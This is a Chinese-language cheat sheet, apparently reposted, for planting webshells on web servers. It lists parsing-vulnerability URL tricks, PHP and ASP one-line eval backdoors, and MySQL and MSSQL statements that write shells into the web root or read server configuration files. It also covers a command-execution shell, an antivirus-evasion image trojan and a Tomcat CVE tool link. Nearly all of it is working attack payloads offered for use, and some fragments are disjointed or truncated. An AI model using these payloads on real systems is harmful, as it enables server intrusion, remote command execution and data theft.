然后再通过备份数据库后访问此界面Getshell。
http://www.xxx.com/xx.asp/xx.jpg
http://www.xxx.com/xx.asp/xx.txt
http://www.xxx.com/xx.asp/xx.asp;jpg
http://www.xxx.com/xx.jpg/.php
http://www.xxx.com/xx.jpg%00.php
http://www.xxx.com/xx.php.owf.rar
逆向解析,直到能解析出php为止
http://www.xxx.com/xx.jpg(非编码空格)\0.php
%><%eval request("v01cano")%><%
select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";
关于此语句说明,在windows中有时候需要使用斜杠/有时候需要使用双反斜杠\末尾有时候需要分号,有时候也不需要分号。也可以先将一句话通过ecshop的新建管理员写入到user表中,然后通过数据库备份配合解析漏洞Getshell。
echo ^<^?php @eval($_POST[C0cho]);?^>^ >c:.php
echo -e "<?php @assert($_POST[C0cho])?>" > 1.php
Linux需要在$前加\进行防转义,Windows需要在<前加^防转义,Windows和Linux中的 “可以使用’或不使用进行尝试
include file="123.jpg"
调用的文件必须和被调用的文件在同一目录,否则找不到,如果不在同一目录,用下面语句也使用如下代码include virtual="文件所在目录/123.jpg"
<?php
include('123.jpg');
?>
<?php fputs(fopen("shell1.php","w"),'1111<?php @assert($_POST[xss])?>2222')?>等一句话木马)
将一句话木马
访问浏览器查看是否成功
create table cmd (a varchar(50));
insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%>
select * into [a] in 'e:\web\webshellcc.asa;x.xls' 'excel 4.0;' from cmd
drop table cmd
https://www.webshell.cc/1.asa;x.xls
exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>"
方法一
create TABLE xiaoma (xiaoma1 text NOT NULL);
insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma]);?>');
select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';
drop TABLE IF EXISTS xiaoma;
方法二
select "<?php eval($_POST[v01cano]);?>" into outfile 'D:/phpstudy/www/a.php'
方法三
当数据库路径未知时Getshell
//创建表a,并且将httpd.conf写入到表a中
create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;
然后执行导出操作,将该文件下载,使用notepad++打开,最后搜索documentroot,即可找到网站的根目录:
文件可能存在的一些路径:
# Windows
c:\windows\php.ini # php配置文件
c:\windows\system32\inetsrv\MetaBase.xml # IIS虚拟主机配置文件
# Linux
/etc/php.ini # php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf # Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/mysql
/user/local/httpd/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf # 虚拟目录配置文件
/user/local/nginx/conf/httpd.conf # Nginx配置文件
方法四
通过load_file函数直接加载该文件内容
select load_file('C:/phpStudy/Apache/conf/httpd.conf');
同时需要做如下配置
方法五
general_log_file方法获取Webshell,show global variables like ‘secure%’显示secure_file_priv的值为NULL,不能利用写into outfile写木马getshell。
show global variables like "%genera%"; #查看genera文件配置情况
set global general_log = off; #关闭general_log
set global general_log = 'on'; #如果general_log关闭需要开启
set global general_log_file = 'D:/www/web/shell.php'
方法六
可执行命令方式
select '<?php echo \'<pre>\'; system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/shell.php'
使用方法
www.xxx.com/shell.php?cmd=ipconfig #cmd=后面加命令
方法七
过杀毒软件方式,上传图片马c.jpg,图片马内容如下:
www.xxx.com/shell.php?cmd=ipconfig #cmd=后面加命令
导出Webshell
select '<?php include 'c.jpg'?>' INTO OUTFILE 'D:/work/www/shell.php'
方法八
直接导出加密Webshell
select unhex('加密代码') into dumpfile 'D:/www/web/shell.php'
<?php eval($_POST[c]);?>;
等信息,使其日志记录此代码,然后访问日志路径,菜刀连接Getshell,如phpinfo();中能查看到error.log和access.log的路径。
Tomcat put上传 CVE-2017-12615 工具传送门:https://link.zhihu.com/?target=https%3A//github.com/iBearcat/CVE-2017-12615
转自: